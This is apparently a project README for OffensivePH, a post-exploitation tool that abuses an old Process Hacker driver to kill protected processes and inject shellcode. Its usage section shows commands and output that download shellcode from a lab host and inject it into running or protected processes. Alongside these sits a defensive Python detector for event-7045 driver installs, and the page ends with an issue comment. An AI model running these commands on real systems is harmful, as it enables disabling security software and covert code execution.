OffensivePH - use old Process Hacker driver to bypass several user-mode access controls

Overview

OffensivePH is a post-exploitation tool that utilizes an old Process Hacker driver to bypass several user-mode access controls.

Usage

  • Compile OffensivePH with VS2019 (tested).
  • Execute with Admin privileges.
  • offensiveph.exe: standalone tool that can be used as a shellcode loader or process killer.
  • Hook2Kph.dll: a DLL that can be injected into your process to redirect several standard API calls to IOCTLs. Tools like sRDI can be used to convert Hook2Kph.dll into shellcode and inject it into your process.
  • OffensivePH extracts the old Process Hacker driver from its resource section into the current directory under the name kph.sys and creates a service to load the driver. After execution, the service and the file are deleted automatically.
offensiveph.exe [-kill|-peb|-hijack|-apcinject] [<PID>] [<URL>]
	-kill		: Kill a process (can kill PPLs)
	-peb		: Read the PEB of a process
	-hijack		: Inject shellcode using thread execution hijacking
	-apcinject	: Inject shellcode into a new services.exe (WinTCB-PPL) instance
  • Kill processes
> offensiveph.exe -kill 8228
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[*] Trying to terminate pid: 8228
[+] KphTerminateProcess is SUCCESSFUL
[*] Service and file are removed
  • Inject shellcode using thread execution hijacking
> offensiveph.exe -hijack 8412 http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Connecting to URL for downloading payload
[+] Process 8412 thread is hijacked to execute payload
[*] Service and file are removed
  • Inject shellcode into a new services.exe instance
> offensiveph.exe -apcinject http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Process 652 token is duplicated as Impersonation Token!
[+] Connecting to URL for downloading payload
[+] Protected Shellcode Host Process: 6520
[*] Service and file are removed
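The install-use-remove pattern described above (driver dropped into the working directory as kph.sys, loaded through a freshly created service, then deleted) still leaves a record in the System event log: Service Control Manager event 7045 logs the service name, image path and service type of every newly installed service. The following is an added defensive example, not code from the OffensivePH project; it parses a few constructed 7045-style records (field names follow the event's rendered message, the service names and paths are made up) and flags kernel-driver installs that load from a user profile directory or match the kph.sys file name this README states the tool uses.

```python
import re
from dataclasses import dataclass

# Constructed sample records in the shape of System log event 7045
# ("A service was installed in the system"), one record per string.
# These are made up for the example, not real log captures.
SAMPLE_7045 = [
    "Service Name: KProcessHacker\nService File Name: C:\\Users\\RedSection\\kph.sys\n"
    "Service Type: kernel mode driver\nService Start Type: demand start",
    "Service Name: WdNisDrv\nService File Name: C:\\Windows\\System32\\drivers\\WdNisDrv.sys\n"
    "Service Type: kernel mode driver\nService Start Type: demand start",
    "Service Name: MyAgent\nService File Name: C:\\Users\\max\\Desktop\\agent.exe\n"
    "Service Type: user mode service\nService Start Type: auto start",
]

@dataclass
class Finding:
    service: str
    image: str
    reasons: tuple

FIELD = re.compile(r"^(Service Name|Service File Name|Service Type): (.*)$", re.M)
# Driver file name stated in the README; extend with other known-abusable names.
WATCHED_DRIVERS = {"kph.sys"}
USER_DIR = re.compile(r"^[a-z]:\\users\\", re.I)

def parse_7045(record: str) -> dict:
    """Return the fields of one 7045 record as a dict (keys as in the event)."""
    return {k: v.strip() for k, v in FIELD.findall(record)}

def check_driver_install(record: str):
    """Flag kernel-driver installs that load from a user-writable profile path
    or match a watched driver file name. Returns a Finding or None."""
    f = parse_7045(record)
    if "kernel mode driver" not in f.get("Service Type", "").lower():
        return None  # only kernel drivers matter for this pattern
    image = f.get("Service File Name", "")
    name = image.rsplit("\\", 1)[-1].lower()
    reasons = []
    if name in WATCHED_DRIVERS:
        reasons.append("known-abusable driver name")
    if USER_DIR.match(image):
        reasons.append("driver loaded from user profile directory")
    return Finding(f.get("Service Name", ""), image, tuple(reasons)) if reasons else None

def scan(records):
    """Run the check over a list of 7045 records and return only the findings."""
    return [x for x in (check_driver_install(r) for r in records) if x]

if __name__ == "__main__":
    for hit in scan(SAMPLE_7045):
        print(f"[!] {hit.service}: {hit.image} ({'; '.join(hit.reasons)})")
```

Because the tool removes the service and file after use, the 7045 record (and a matching Sysmon driver-load event, if Sysmon is deployed) is often the only durable artifact, so this check should run on forwarded logs rather than on the host's live service list.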

References

This repo contains a lot of code and inspiration from the original Process Hacker code.

TODO

  • Reflective DLLs and C2 implementation
  • Hiding Kph Driver

Comments
  • Failed to connect KProcessHacker Driver

    C:\Users\max\Desktop>offensiveph.exe -kill 4952

    OffensivePH

    [*] Driver path: C:\Users\max\Desktop\kph.sys
    [-] Failed to connect KProcessHacker Driver. Exiting...
    [*] Service and file are removed

    C:\Users\max\Desktop>

    opened by wgetnz 9
Owner

Red Section